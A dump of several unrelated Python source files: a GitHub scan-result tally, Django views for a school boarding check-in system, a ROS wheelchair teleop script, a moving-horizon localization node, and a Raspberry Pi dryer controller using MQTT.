def check_org_chunk(resultqueue, orgs, conc, procs, public=False):
results = []
try:
ghscanner = GHScanner(conc, procs, public)
for org in orgs:
res = ghscanner.check_single_org(org)
results.append(res)
print(f"{org} ({res['scan_time']})")
except Exception as e:
print(f"Error: {e} in check_org_chunk")
resultqueue.put(results)
#get recap info for the dac.py file
@staticmethod
def get_dac_recap(results):
r = 0
v = 0
s = 0
for org in results['orgs']:
r += len(org)
oname = next(iter(org))
for repo in org[oname]:
rname = next(iter(repo))
for file in repo[rname]:
fname = next(iter(file))
v += len(file[fname]['vulnerable'])
s += len(file[fname]['sus'])
return {'repos_scanned': r, 'vulnerable': v, 'sus': s}
#writes json output to filename
@staticmethod
def write_output_file(resultsfile, resultsjson, print_name=True):
try:
jsonoutput = json.dumps(resultsjson, indent=4)
with open(resultsfile, "w") as file:
file.write(jsonoutput)
if print_name:
print(os.path.realpath(resultsfile))
except Exception as e:
print(f"Error: {e} in write_output_file")
|
views.py | from django.shortcuts import render, redirect
from StudentManager.functions import viewStudents
from StudentManager.models import Students, Allowed, CurrentSeason, Seasons, CheckIn, Pointers
import concurrent.futures
import threading
from django.utils import timezone
import datetime
from Manager.functions import incrementTotalCheckIn, decrementTotalCheckIn
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.utils.html import strip_tags
from django.contrib import messages
from django.urls import reverse
from django.contrib.auth.decorators import login_required
from Dashboard.decorators import management
@login_required(login_url='login')
def viewStudentsList(request):
#if bool(Group.objects.get(name="accounts") in User.objects.get(username=request.user).groups.all() or
# Group.objects.get(name="principal") in User.objects.get(username=request.user).groups.all() or
# Group.objects.get(name="administrator") in User.objects.get(username=request.user).groups.all()) == False:
# return render(request, 'dashboard/dashboard.html',
# {'CheckStat': CheckStat.objects.get(id=1),
# 'students': Students.objects.all().filter(CheckedOut="Yes").order_by('LastName') | Students.objects.all().filter(CheckedIn="Yes").order_by('LastName'),
# 'mode': 'viewCheckIn'})
return viewStudents(request, "viewStudentsPass.html")
@login_required(login_url='login')
@management
def viewStudentsListAdmin(request):
#if bool(Group.objects.get(name="accounts") in User.objects.get(username=request.user).groups.all() or
# Group.objects.get(name="principal") in User.objects.get(username=request.user).groups.all() or
# Group.objects.get(name="administrator") in User.objects.get(username=request.user).groups.all()) == False:
# return render(request, 'dashboard/dashboard.html',
# {'CheckStat': CheckStat.objects.get(id=1),
# 'students': Students.objects.all().filter(CheckedOut="Yes").order_by('LastName') | Students.objects.all().filter(CheckedIn="Yes").order_by('LastName'),
# 'mode': 'viewCheckIn'})
return viewStudents(request, "viewStudentsPassAdmin.html")
@login_required(login_url='login')
@management
def viewCheckInProfileAdmin(request, pk):
student = Students.objects.get(pk=pk)
season = CurrentSeason.objects.get(pk=1).Season
checkin = ""
allowed = ""
if CheckIn.objects.filter(Student=student, Season=season).exists():
checkedIn = "Yes"
checkin = CheckIn.objects.get(Student=student, Season=season)
else:
checkedIn = "No"
if Allowed.objects.filter(Student=student, Season=season).exists():
allowed = Allowed.objects.get(Student=student, Season=season)
else:
allowed = ""
return render(request, "checkInProfilePassAdmin.html", {'student': student, 'checkedIn': checkedIn, 'checkin': checkin,
'allowed': allowed})
@login_required(login_url='login')
def viewCheckInProfile(request, pk):
student = Students.objects.get(pk=pk)
season = CurrentSeason.objects.get(pk=1).Season
checkin = ""
allowed = ""
if CheckIn.objects.filter(Student=student, Season=season).exists():
checkedIn = "Yes"
checkin = CheckIn.objects.get(Student=student, Season=season)
else:
checkedIn = "No"
if Allowed.objects.filter(Student=student, Season=season).exists():
allowed = Allowed.objects.get(Student=student, Season=season)
else:
allowed = ""
return render(request, "checkInProfilePass.html", {'student': student, 'checkedIn': checkedIn, 'checkin': checkin,
'allowed': allowed})
def Pass_helperAdmin(request, id):
if request.method == "POST":
reason = request.POST.getlist("reason")[0]
current_season = CurrentSeason.objects.get(pk=1)
season = Seasons.objects.get(SeasonName=current_season)
student = Students.objects.get(pk=id)
if Pointers.objects.filter(id=1).exists():
pass_code = Pointers.objects.get(id=1).PassCodePointer + 1
Pointers.objects.filter(id=1).update(PassCodePointer=pass_code)
Pointers.save
else:
pass_code = CheckIn.objects.all().count() + 1
Pointers.objects.create(id=1, Season=season, PassCodePointer=pass_code)
Pointers.save
pass_code = str(pass_code).zfill(4)
print("here")
if Allowed.objects.filter(Student=student, Season=season).exists():
Allowed.objects.create(Student=student, Season=season, Clear="Yes")
Allowed.save
else:
Allowed.objects.filter(Student=student, Season=season).update(Clear="Yes")
Allowed.save
if CheckIn.objects.filter(Student=student, Season=season).exists():
CheckIn.objects.filter(Student=student,
Season=season).update(Passed="Yes", PassCode=pass_code,
ReasonPass=reason, DateTimeStamp=timezone.now(),
ByStaffPass=(str(request.user.last_name) + ", " + str(request.user.first_name)))
CheckIn.save
#incrementTotalCheckIn()
else:
CheckIn.objects.create(Student=student,
Season=season, Passed="Yes", PassCode=pass_code,
ReasonPass=reason,
DateTimeStamp=timezone.now(),
ByStaffPass=(str(request.user.last_name) + ", " + str(request.user.first_name)))
CheckIn.save
#incrementTotalCheckIn()
print("checked in----")
def Pass_helper(request, id):
if request.method == "POST":
current_season = CurrentSeason.objects.get(pk=1)
season = Seasons.objects.get(SeasonName=current_season)
student = Students.objects.get(pk=id)
if Pointers.objects.filter(id=1).exists():
pass_code = Pointers.objects.get(id=1).PassCodePointer + 1
Pointers.objects.filter(id=1).update(PassCodePointer=pass_code)
Pointers.save()
else:
pass_code = CheckIn.objects.all().count() + 1
Pointers.objects.create(id=1, Season=season, PassCodePointer=pass_code)
Pointers.save
pass_code = str(pass_code).zfill(4)
if CheckIn.objects.filter(Student=student, Season=season).exists():
CheckIn.objects.filter(Student=student,
Season=season).update(Passed="Yes", PassCode=pass_code,
ReasonPass="Fulfilled all requirements.", DateTimeStamp=timezone.now(),
ByStaffPass=(str(request.user.last_name) + ", " + str(request.user.first_name)))
CheckIn.save
#incrementTotalCheckIn()
else:
CheckIn.objects.create(Student=student,
Season=season, Passed="Yes", PassCode=pass_code,
ReasonPass="Fulfilled all requirements.",
DateTimeStamp=timezone.now(),
ByStaffPass=(str(request.user.last_name) + ", " + str(request.user.first_name)))
CheckIn.save
#incrementTotalCheckIn()
print("checked in----")
def sendEMail(request, mailHead, recipient, template, context):
msg=""
if recipient != "None":
html_message = render_to_string("" + template, {
'context': context})
plain_message = strip_tags(html_message)
try:
send_mail(mailHead,
plain_message,
'wagbarafranklin@yahoo.com',
[recipient],
html_message=html_message,
fail_silently=False)
msg = "Email sent Successfully!"
return msg
except:
msg = "Email failed!"
return msg
else:
msg = "Operation Failed! No recipient provided."
return msg
def wardCheckedInEmail(request, pk):
student = Students.objects.get(pk=pk)
mailHead = "You Ward have being Checked-in into Brookstone Secondary Boarding Facility"
#recipient = student.ParentEmail
recipient = "wagbarafranklin@yahoo.com"
context = student
template = "EmailPassSuccess.html"
message = sendEMail(request, mailHead, recipient, template, context)
return message
@login_required(login_url='login')
def Pass(request, pk):
#with concurrent.futures.ThreadPoolExecutor() as executor:
# results = [executor.submit(checkin_helper, request, id), executor.submit(wardCheckedInEmail, request, id)]
# for f in concurrent.futures.as_completed(results):
# if f.result() != "EmailNoneResult":
# message = f.result()
# return message
t1 = threading.Thread(target=Pass_helper, args=[request, pk])
t2 = threading.Thread(target=wardCheckedInEmail, args=[request, pk])
message = t1.start()
message2 = t2.start()
message = "Verification Successfull! Student is cleared to pass."
if "Successfull" in message:
messages.success(request, message)
else:
messages.error(request, message)
return redirect("/Pass/viewCheckInProfile/" + str(pk))
#return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
#return redirect("/Pass/viewCheckInProfile/" + str(pk))
@login_required(login_url='login')
@management
def PassAdmin(request, pk):
# with concurrent.futures.ThreadPoolExecutor() as executor:
# results = [executor.submit(checkin_helper, request, id), executor.submit(wardCheckedInEmail, request, id)]
# for f in concurrent.futures.as_completed(results):
# if f.result() != "EmailNoneResult":
# message = f.result()
# return message
t1 = threading.Thread(target=Pass_helperAdmin, args=[request, pk])
t2 = threading.Thread(target=wardCheckedInEmail, args=[request, pk])
message = t1.start()
message2 = t2.start()
message = "Verification Successfull! Student is cleared to pass."
if "Successfull" in message:
print("here " + message)
messages.success(request, message)
else:
messages.error(request, message)
return redirect("/Pass/viewCheckInProfileAdmin/" + str(pk)) |
control_with_labview.py | #!/usr/bin/env python
from __future__ import print_function
import threading
import time
import roslib; roslib.load_manifest('teleop_twist_keyboard')
import rospy
from geometry_msgs.msg import Twist
global task
task ="stop"
import sys, select, termios, tty
from vision_2 import get_obj2w
import socket
import random
PORT = 8089
HOST = '192.168.0.2' # The server's hostname or IP address
#HOST = '127.0.0.1'
from datetime import datetime
from ctypes import *
SIZE_DATA_TCP_MAX = 200
class Data(Union):
_fields_ = [("byte", c_ubyte * SIZE_DATA_TCP_MAX),("int7Arr", c_int * 7),("float63dArr", c_float * 63)]
write_buffer = (c_char* 1024)()
def tcp_init():
global client, send_data
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (HOST, PORT)
client.connect(server_address)
send_data = Data()
def tcp_com():
#'''
global client
global send_data,task
start = datetime.now()
try:
task_data = get_obj2w()
print("task_data",task_data)
send_data.float63dArr[6]=task_data[0,0]
send_data.float63dArr[7]=task_data[0,1]
send_data.float63dArr[8]=task_data[0,2]
except:
pass
#send_data.int7Arr[0]=random.randrange(1,100)
send_data.float63dArr[0]=1.7
memmove( write_buffer, send_data.byte,1024)
client.sendall(write_buffer)
end = datetime.now()
labview_control = client.recv(5)
b = bytearray(labview_control)
print(labview_control)
print(task)
print(b[0],type(b[0]))
if b[0]== 48:
print(b[0],type(b[0]))
task = "stop"
else:
if b[1]== 49:
print("googogogo")
task = "go_forward"
elif b[2]== 49:
task = "go_back"
elif b[3]== 49:
task = "turn_left"
elif b[4]== 49:
task = "turn_right"
else:
task = "stop"
class ControlWheelchair():
def __init__(self):
rospy.init_node('Controlwheelchair',anonymous=False)
rospy.loginfo("now wheelchair start")
rospy.on_shutdown(self.shutdown)
self.cmd_vel = rospy.Publisher('cmd_vel', Twist, queue_size = 1)
self.rate = rospy.Rate(10)
self.move_cmd = Twist()
#move_cmd.linear.x = 0.3
#move_cmd.angular.z = 0
global task
self.task = task
print("Ros Control",self.task)
while not rospy.is_shutdown():
#self.rate.sleep(10)
self.task = task
print("self task",self.task)
rospy.sleep(0.1)
print("move_cmd",self.move_cmd)
if self.task == "go_forward":
print("lllllllllllllllllllllllllllllllllllllll")
self.move_cmd = Twist()
self.move_cmd.linear.x = 0.1
self.cmd_vel.publish(self.move_cmd)
elif self.task =="go_back":
self.move_cmd = Twist()
self.move_cmd.linear.x = -0.1
self.cmd_vel.publish(self.move_cmd)
elif self.task =="turn_left":
self.move_cmd = Twist()
self.move_cmd.angular.z = 0.1
self.cmd_vel.publish(self.move_cmd)
elif self.task =="turn_right":
self.move_cmd = Twist()
self.move_cmd.angular.z = -0.1
self.cmd_vel.publish(self.move_cmd)
elif self.task =="stop":
print("hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh")
self.move_cmd = Twist()
self.cmd_vel.publish(self.move_cmd)
def shutdown(self):
rospy.loginfo("Stopping wheelchair")
self.cmd_vel.publish(Twist())
rospy.sleep(1)
def tcp_com_while():
while True:
try:
tcp_com()
except:
pass
time.sleep(0.1)
def control():
ControlWheelchair()
if __name__=="__main__":
#try:
tcp_init()
t_tcp_com = threading.Thread(target=tcp_com_while)
t_tcp_com.start()
ControlWheelchair()
#except:
# rospy.loginfo("End of this trip for wheelchair")
|
mhe_localization_node.py | #!/usr/bin/env python
"""
Moving Horizon Estimation Localization
Copyright © 2020 Mostafa Osman
Permission is hereby granted, free of charge,
to any person obtaining a copy of this software
and associated documentation files (the “Software”),
to deal in the Software without restriction,
including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom
the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# Importing the classes for the node
import Odometry_class
import mhe_localization_class
# Importing Python and ROS libraries
import rospy
import math
import threading
import numpy as np
from tf.transformations import euler_from_quaternion
# Importing ROS messages
from std_msgs.msg import Float64
from geometry_msgs.msg import Twist
from geometry_msgs.msg import Pose
from nav_msgs.msg import Odometry
from sensor_msgs.msg import Imu
# Importing Casadi
from sys import path
global data_available
global MHE
global freq
global Odometries
global Odometries_topics
global N_mhe
global N_of_odometries
global N_of_imus
global mahalabonis_thresholds_odom
global first_interface
lock = threading.Lock()
def mhe_interface():
global MHE
global data_available
global lock
data_available = False
first_run = True
MHE = mhe_localization_class.mhe_localization(Odometries, freq, N_mhe, N_of_odometries + N_of_imus,
mahalabonis_thresholds_odom, lock)
MHE.problem_formulation()
rate = rospy.Rate(freq)
while not rospy.is_shutdown():
if first_run:
for i in range(0, N_of_odometries + N_of_imus):
if Odometries[i].first_call:
pass
else:
first_run = False
data_available = MHE.measurements_storing()
rate.sleep()
if not first_run:
data_available = MHE.measurements_storing()
rate.sleep()
def mhe_localization_node():
global data_available
global lock
data_available = False
starting_counter = 0
rate = rospy.Rate(freq) # hz
while not rospy.is_shutdown():
# mhe localizaiton
if data_available:
MHE.mhe()
data_available = False
rate.sleep()
def main():
global freq
global Odometries
global Odometries_topics
global N_mhe
global N_of_odometries
global N_of_imus
global mahalabonis_thresholds_odom
global first_interface
# Initializing the ROS node with a name "mhe_localization"
rospy.init_node('mhe_localization', anonymous=True)
# Getting the parameters from the config file of the package (Number of Oodmetries and Odometries topics names)
if rospy.has_param('N_of_Odometries'):
N_of_odometries = rospy.get_param('N_of_Odometries')
else:
rospy.logerr('The parameter N_of_Odometries is not specified in the yaml file')
if rospy.has_param('N_of_imus'):
N_of_imus = rospy.get_param('N_of_imus')
else:
rospy.logerr('The parameter N_of_imus is not specified in the yaml file')
if rospy.has_param('node_frequency'):
freq = rospy.get_param('node_frequency')
else:
rospy.logerr('The parameter Sampling time is not specified in the yaml file')
if rospy.has_param('estimation_horizon'):
N_mhe = rospy.get_param('estimation_horizon')
else:
rospy.logerr('The parameter Sampling time is not specified in the yaml file')
mahalabonis_thresholds_odom = np.zeros(N_of_odometries)
mahalabonis_thresholds_imu = np.zeros(N_of_imus)
Odometries_topics = [""] * N_of_odometries
Imus_topics = [""] * N_of_imus
Odometries_configuration = np.zeros((N_of_odometries, 15))
Imu_configuration = np.zeros((N_of_imus, 15))
Odometries = [Odometry_class.OdometryInterface() for i in range(N_of_odometries + N_of_imus)]
# Initializing the Odometry Objects and subscribing to the topics indicated in the parameter file
for i in range(0, N_of_odometries):
if rospy.has_param('odom_' + str(i) + '_mahalanobis_threshold'):
mahalabonis_thresholds_odom[i] = rospy.get_param("odom_" + str(i) + '_mahalanobis_threshold')
else:
rospy.logerr('Number of Odometries indicated in the yaml file is not correct')
for i in range(0, N_of_imus):
if rospy.has_param('imu_' + str(i) + '_mahalanobis_threshold'):
mahalabonis_thresholds_imu[i] = rospy.get_param('imu_' + str(i) + '_mahalanobis_threshold')
else:
rospy.logerr('Number of imus indicated in the yaml file is not correct')
for i in range(0, N_of_odometries):
if rospy.has_param('odom_' + str(i)):
Odometries_topics[i] = rospy.get_param("odom_" + str(i))
else:
rospy.logerr('Number of Odometries indicated in the yaml file is not correct')
for i in range(0, N_of_imus):
if rospy.has_param('imu_' + str(i)):
Imus_topics[i] = rospy.get_param('imu_' + str(i))
else:
rospy.logerr('Number of imus indicated in the yaml file is not correct')
for i in range(0, N_of_odometries):
if rospy.has_param('odom_' + str(i) + '_config'):
Odometries_configuration[i, :] = rospy.get_param("odom_" + str(i) + "_config")
else:
rospy.logerr('Number of Odometries indicated in the yaml file is not correct')
for i in range(0, N_of_imus):
if rospy.has_param('imu_' + str(i) + '_config'):
Imu_configuration[i, :] = rospy.get_param('imu_' + str(i) + '_config')
else:
rospy.logerr('Number of imus indicated in the yaml file is not correct')
for i in range(0, N_of_odometries):
Odometries[i].Odometry_initialize(i, Odometries_topics[i], Odometries_configuration[i, :], N_mhe,
mahalabonis_thresholds_odom[i])
rospy.Subscriber(Odometries_topics[i], Odometry, Odometries[i].odometryCb, queue_size=1)
for i in range(N_of_odometries, N_of_odometries + N_of_imus):
Odometries[i].Imu_initialize(i, Imus_topics[i - N_of_odometries],
Imu_configuration[i - N_of_odometries, :], N_mhe,
mahalabonis_thresholds_imu[i - N_of_odometries])
rospy.Subscriber(Imus_topics[i - N_of_odometries], Imu, Odometries[i].odometryCb, queue_size=1)
threading.Thread(target=mhe_interface).start()
threading.Thread(target=mhe_localization_node).start()
rospy.spin()
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
exec.py | import sys, os, time, json, queue
import datetime
import board, busio
import serial
import paho.mqtt.client as mqtt
import RPi.GPIO as GPIO
import adafruit_character_lcd.character_lcd_i2c as character_lcd
import MAX6675
from hx711 import HX711
import random
import threading
global g_print_lcd_output_door_topic
g_print_lcd_output_door_topic = ''
global g_print_lcd_output_door_msg
g_print_lcd_output_door_msg = ''
global g_print_lcd_safe_door_topic
g_print_lcd_safe_door_topic = ''
global g_print_lcd_safe_door_msg
g_print_lcd_safe_door_msg = ''
q = queue.Queue()
global buzzer_running
buzzer_running = 0
global arr_count
arr_count = 5
global bottom_temp_arr, top_temp_arr
bottom_temp_arr = [0,0,0,0,0]
top_temp_arr = [0,0,0,0,0]
#---SET Pin-------------------------------------------------------------
# Switch
Debug_switch_pin = 16 # Debug Switch : Digital_Input_3
SW4_pin = 38 # Start Button : Digital_Input_2
Push_SW_pin = 38 # Start Button : Digital_Input_8
Select_SW = 6 # Select Switch : Digital_Input_7
# Load Cell (Direct)
DAT = 34
CLK = 35
# LCD I2C
SDA = 30 # SDA_LCD-DAT 28
SCL = 31 # SCL_LCD-CLK 27
# Digital IN
Input_Door_pin = 7 # Input Door Sensor() : Digital_Input_4
Output_Door_pin = 10 # Output Door Sensor() : Digital_Input_5
Safe_Door_pin = 11 # Safe Door Sensor(Front Door) : Digital_Input_6
# Digital OUT (Arduino)
Heat_12 = 13 # Digital_Output_12
Heat_3 = 12 # Digital_Output_11
Heat_4 = 11 # Digital_Output_10
Mix_motor = 10 # Digital_Output_13(red)
Cooling_motor = 9 # Digital_Output_14
Sol_val = 6 # Digital_Output_15
Buzzer = 5
# Temperature 1 Top
CLK1 = 27 # Digital_Input_9
CS1 = 26 # Digital_Input_10
SO1 = 17 # Digital_Input_11
# Temperature 2 Bottom
CLK2 = 41 # Digital_Input_12
CS2 = 40 # Digital_Input_13
SO2 = 39 # Digital_Input_14
#---SET GPIO------------------------------------------------------------
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
# Switch
GPIO.setup(Debug_switch_pin, GPIO.IN, GPIO.PUD_UP)
GPIO.setup(SW4_pin, GPIO.IN, GPIO.PUD_UP)
GPIO.setup(Push_SW_pin, GPIO.IN, GPIO.PUD_UP)
GPIO.setup(Select_SW, GPIO.IN, GPIO.PUD_UP)
# Door
GPIO.setup(Input_Door_pin, GPIO.IN,GPIO.PUD_UP)
GPIO.setup(Output_Door_pin, GPIO.IN,GPIO.PUD_UP)
GPIO.setup(Safe_Door_pin, GPIO.IN,GPIO.PUD_UP)
#---GET Door------------------------------------------------------------
def get_input_door(Input_Door_pin):
input_door = GPIO.input(Input_Door_pin)
json_input_door = val_to_json(input_door)
return (json_input_door)
def get_output_door(Output_Door_pin):
output_door = GPIO.input(Output_Door_pin)
json_output_door = val_to_json(output_door)
return (json_output_door)
def get_safe_door(Safe_Door_pin):
safe_door = GPIO.input(Safe_Door_pin)
json_safe_door = val_to_json(safe_door)
return (json_safe_door)
#-----------------------------------------------------------------------
#---Operation Mode------------------------------------------------------
def Operation(Select_SW):
sel_sw = GPIO.input(Select_SW)
sel_sw = val_to_json(sel_sw)
return (sel_sw)
#---Start Button--------------------------------------------------------
def start_btn(SW4_pin):
SW4 = GPIO.input(SW4_pin)
SW4 = val_to_json(SW4)
return (SW4)
# Temperature
sensor1 = MAX6675.MAX6675(CLK1, CS1, SO1)
sensor2 = MAX6675.MAX6675(CLK2, CS2, SO2)
#---GET Temperature-----------------------------------------------------
def get_temp():
global avg_bottom_temp, avg_top_temp
top_temp = round(sensor1.readTempC(), 1)
bottom_temp = round(sensor2.readTempC(), 1)
for i in range(arr_count):
if (i > 0):
bottom_temp_arr[i-1] = bottom_temp_arr[i]
top_temp_arr[i-1] = top_temp_arr[i]
bottom_temp_arr[arr_count-1] = bottom_temp
top_temp_arr[arr_count-1] = top_temp
avg_bottom_temp = round((sum(bottom_temp_arr) / arr_count), 2)
avg_top_temp = round((sum(top_temp_arr) / arr_count), 2)
temperature1 = val_to_json(avg_top_temp, avg_bottom_temp)
return (temperature1)
#---Debug Button--------------------------------------------------------
def debug_mode(Debug_switch_pin):
debug_val = GPIO.input(Debug_switch_pin)
debug_val = val_to_json(debug_val)
return (debug_val)
#---SET Load Cell & GET Weight------------------------------------------
def cleanAndExit():
print("Cleaning...")
if not EMULATE_HX711:
GPIO.cleanup()
print("Bye!")
sys.exit()
def init_loadcell(referenceUnit = 1):
global hx
global nWeightCount
nWeightCount = 1
hx = HX711(34, 35)
hx.set_reading_format("MSB", "MSB")
hx.set_reference_unit(referenceUnit)
hx.reset()
def set_factor(referenceUnit):
hx.set_reference_unit(referenceUnit)
hx.reset()
def calc_ref_Unit(reference_weight, set_ref_Unit):
ref_weight_total = 0
for i in range(nWeightCount):
weight = hx.get_weight(5)
ref_weight_total += weight
avg_ref_weight = (ref_weight_total / nWeightCount)
cur_weight = (avg_ref_weight - avg_zero_weight)
cur_weight = max(0, float(cur_weight))
cur_factor = (cur_weight / reference_weight)
if (cur_factor == 0.0):
cur_factor = set_ref_Unit
hx.set_reference_unit(cur_factor)
hx.reset()
factor_weight_total = 0
for i in range(nWeightCount):
weight = hx.get_weight(5)
factor_weight_total += weight
avg_factor_weight = (factor_weight_total / nWeightCount)
avg_factor_weight = max(0, float(avg_factor_weight))
correlation_value = avg_factor_weight - reference_weight
factor = {"factor":cur_factor, "correlation_value":correlation_value}
with open ("./factor.json", "w") as factor_json:
json.dump(factor, factor_json)
print("Complete!")
calc_ref_unit = val_to_json(cur_factor, correlation_value)
return calc_ref_unit
def get_loadcell():
global flag
global weight_arr
try:
if (flag == 0):
for i in range(arr_count):
weight = hx.get_weight(5)
weight_arr[i] = weight
flag = 1
else:
weight = hx.get_weight(5)
for i in range(arr_count):
if (i > 0):
weight_arr[i-1] = weight_arr[i]
weight_arr[arr_count-1] = weight
avg_weight = round((sum(weight_arr) / arr_count), 2)
final_weight = avg_weight - correlation_value
final_weight = max(0, float(final_weight))
weight_json = val_to_json(final_weight)
except (KeyboardInterrupt, SystemExit):
cleanAndExit()
return (weight_json)
def ref_weight(tare_weight):
global reference_weight
reference_weight = tare_weight
val = val_to_json(1)
init_loadcell(1)
global avg_zero_weight
zero_weight = 0
for i in range(5):
weight = hx.get_weight(5)
zero_weight += weight
avg_zero_weight = (zero_weight / 5)
avg_zero_weight = max(0, float(avg_zero_weight))
print("Add weight for initialize...")
return val
#-----------------------------------------------------------------------
#---Serial Communication with Arduino-----------------------------------
def Serial_Feather(pin=None, pin2=None, pin3=None, val=None, val2=None, val3=None):
if (pin != None and pin2 == None and pin3 == None):
ser_msg = ('<' + str(pin) + ',' + str(val) + '>\n').encode()
#print(ser_msg)
ser.write(ser_msg)
elif (pin != None and pin2 != None and pin3 != None):
ser_msg = ('<' + str(pin) + ',' + str(val) + '/' + str(pin2) + ',' + str(val2) + '/' + str(pin3) + ',' + str(val3) + '>\n').encode()
#print(ser_msg)
ser.write(ser_msg)
#-----------------------------------------------------------------------
#---Heater--------------------------------------------------------------
def heater(Heat_12, Heat_3, Heat_4, val, val2, val3):
Serial_Feather(pin=Heat_12, pin2=Heat_3, pin3=Heat_4, val=val, val2=val2, val3=val3)
#---Buzzer--------------------------------------------------------------
def buzzer(Buzzer, val):
Serial_Feather(pin=Buzzer, val=val)
#print ("Beep")
#---Solenoid------------------------------------------------------------
def solenoid(Sol_val, val):
Serial_Feather(pin=Sol_val, val=val)
#---Fan-----------------------------------------------------------------
def fan(Cooling_motor, val):
Serial_Feather(pin=Cooling_motor, val=val)
#---Stirrer-------------------------------------------------------------
def stirrer(Mix_motor, val):
Serial_Feather(pin=Mix_motor, val=val)
def json_to_val(json_val):
payloadData = json.loads(json_val)
if (len(payloadData) == 1):
val = payloadData['val']
return (val)
elif (len(payloadData) == 2):
val = payloadData['val']
val2 = payloadData['val2']
return (val, val2)
elif (len(payloadData) == 3):
val = payloadData['val']
val2 = payloadData['val2']
val3 = payloadData['val3']
return (val, val2, val3)
def val_to_json(val,val2=None):
if (val2 != None):
json_val = {"val":val,"val2":val2}
else:
json_val = {"val":val}
json_val = json.dumps(json_val)
return (json_val)
#---MQTT----------------------------------------------------------------
def on_connect(client,userdata,flags, rc):
print('[dry_mqtt_connect] connect to ', broker_address)
def on_disconnect(client, userdata, flags, rc=0):
print(str(rc))
def on_subscribe(client, userdata, mid, granted_qos):
print("subscribed: " + str(mid) + " " + str(granted_qos))
def func_set_q(f_msg):
if(f_msg.topic == '/set_buzzer'):
if(buzzer_running == 0):
q.put_nowait(f_msg)
#q.put(f_msg)
# elif (msg.topic == '/req_debug_mode'):
# #print("topic: ", msg.topic)
# deb = debug_mode(Debug_switch_pin)
# dry_client.publish("/res_debug_mode", deb)
#
# elif (msg.topic == '/req_start_btn'):
# #print("topic: ", msg.topic)
# sw4_json = start_btn(SW4_pin)
# dry_client.publish("/res_start_btn", sw4_json)
#
# elif (msg.topic == '/req_input_door'):
# #print("topic: ", msg.topic)
# json_input_door = get_input_door(Input_Door_pin)
# #print('input door: ', json_input_door)
# dry_client.publish("/res_input_door", json_input_door)
#
# elif (msg.topic == '/req_output_door'):
# #print("topic: ", msg.topic)
# json_output_door = get_output_door(Output_Door_pin)
# #print("output door: ", json_output_door)
# dry_client.publish("/res_output_door", json_output_door)
#
# elif (msg.topic == '/req_safe_door'):
# #print("topic: ", msg.topic)
# json_safe_door = get_safe_door(Safe_Door_pin)
# #print("safe door: ", json_safe_door)
# dry_client.publish("/res_safe_door", json_safe_door)
#
# elif (msg.topic == '/req_operation_mode'):
# #print("topic: ", msg.topic)
# json_operation_mode = Operation(Select_SW)
# #print("operation: ", json_operation_mode)
# dry_client.publish("/res_operation_mode", json_operation_mode)
# elif (msg.topic == '/req_internal_temp'):
# #print("topic: ", msg.topic)
# temperature = get_temp()
# dry_client.publish("/res_internal_temp", temperature)
#
# elif (msg.topic == '/req_zero_point'):
# #print("topic: ", msg.topic)
# data = msg.payload.decode('utf-8').replace("'", '"')
# reference_weight = json.loads(data)
# reference_weight = reference_weight['val']
# #print ("reference_weight: ", reference_weight)
# val = ref_weight(reference_weight)
# dry_client.publish("/res_zero_point", val)
#
# elif (msg.topic == '/req_calc_factor'):
# #print("topic: ", msg.topic)
# calc_referenceUnit = calc_ref_Unit(reference_weight, set_ref_Unit)
# dry_client.publish("/res_calc_factor", calc_referenceUnit)
#
# elif (msg.topic == '/req_weight'):
# #print("topic: ", msg.topic)
# weight = get_loadcell()
# #print(weight)
# dry_client.publish("/res_weight", weight)
#
# elif (msg.topic == '/print_lcd_internal_temp'):
# #print("topic: ", msg.topic)
# data = msg.payload.decode('utf-8').replace("'", '"')
# top, bottom = json_to_val(data)
# #print ('print_lcd: ', top, ' ', bottom)
# displayTemp(top, bottom)
#
# elif (msg.topic == '/print_lcd_state'):
# #print("topic: ", msg.topic)
# data = msg.payload.decode('utf-8').replace("'", '"')
# state = json_to_val(data)
# displayState(state)
# print('print_lcd_state')
#
# elif (msg.topic == '/print_lcd_debug_message'):
# #print("topic: ", msg.topic)
# data = msg.payload.decode('utf-8').replace("'", '"')
# debug = json_to_val(data)
# #print (debug)
# displayMsg(debug)
#
# elif (msg.topic == '/print_lcd_loadcell'):
# #print("topic: ", msg.topic)
# data = msg.payload.decode('utf-8').replace("'", '"')
# loadcell, target_loadcell = json_to_val(data)
# loadcell = str(loadcell)
# #print(loadcell, ' ', target_loadcell)
# target_loadcell = str(target_loadcell)
# #loadcell = (loadcell[2:(len(loadcell)-5)])
# #target_loadcell = (target_loadcell[2:(len(target_loadcell)-5)])
# displayLoadcell(loadcell, target_loadcell)
#
# elif (msg.topic == '/print_lcd_loadcell_factor'):
# #print("topic: ", msg.topic)
# data = msg.payload.decode('utf-8').replace("'", '"')
# loadcell_factor, corr_val = json_to_val(data)
# displayLoadcellFactor(loadcell_factor)
#
# elif (msg.topic == '/print_lcd_input_door'):
# #print("topic: ", msg.topic)
# data = msg.payload.decode('utf-8').replace("'", '"')
# input_door = json_to_val(data)
# displayInputDoor(input_door)
#
# elif (msg.topic == '/print_lcd_output_door'):
# #print("topic: ", msg.topic)
# data = msg.payload.decode('utf-8').replace("'", '"')
# output_door = json_to_val(data)
# displayOutputDoor(output_door)
#
# elif (msg.topic == '/print_lcd_safe_door'):
# #print("topic: ", msg.topic)
# data = msg.payload.decode('utf-8').replace("'", '"')
# val_safe_door = json_to_val(data)
